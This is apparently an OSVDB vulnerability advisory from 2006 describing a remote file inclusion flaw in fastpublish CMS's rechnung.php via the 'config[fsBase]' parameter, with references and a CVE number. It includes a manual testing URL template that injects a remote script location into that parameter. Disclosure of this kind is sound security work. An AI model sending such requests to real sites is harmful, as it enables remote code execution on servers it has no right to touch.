fastpublish CMS rechnung.php config[fsBase] Variable Remote File Inclusion

2006-05-29T05:35:05
ID OSVDB:26160
Type osvdb
Reporter Kacper(kacper1964@yahoo.pl)
Modified 2006-05-29T05:35:05

Description

Vulnerability Description

fastpublish CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to rechnung.php script not properly sanitizing user input supplied to the 'config[fsBase]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

fastpublish CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to rechnung.php script not properly sanitizing user input supplied to the 'config[fsBase]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]

References:

Vendor URL: http://www.fastpublish.org/ Secunia Advisory ID:20346 Related OSVDB ID: 26157 Related OSVDB ID: 26158 Related OSVDB ID: 26159 Related OSVDB ID: 26161 Related OSVDB ID: 26162 Generic Exploit URL: http://milw0rm.com/exploits/1848 CVE-2006-2726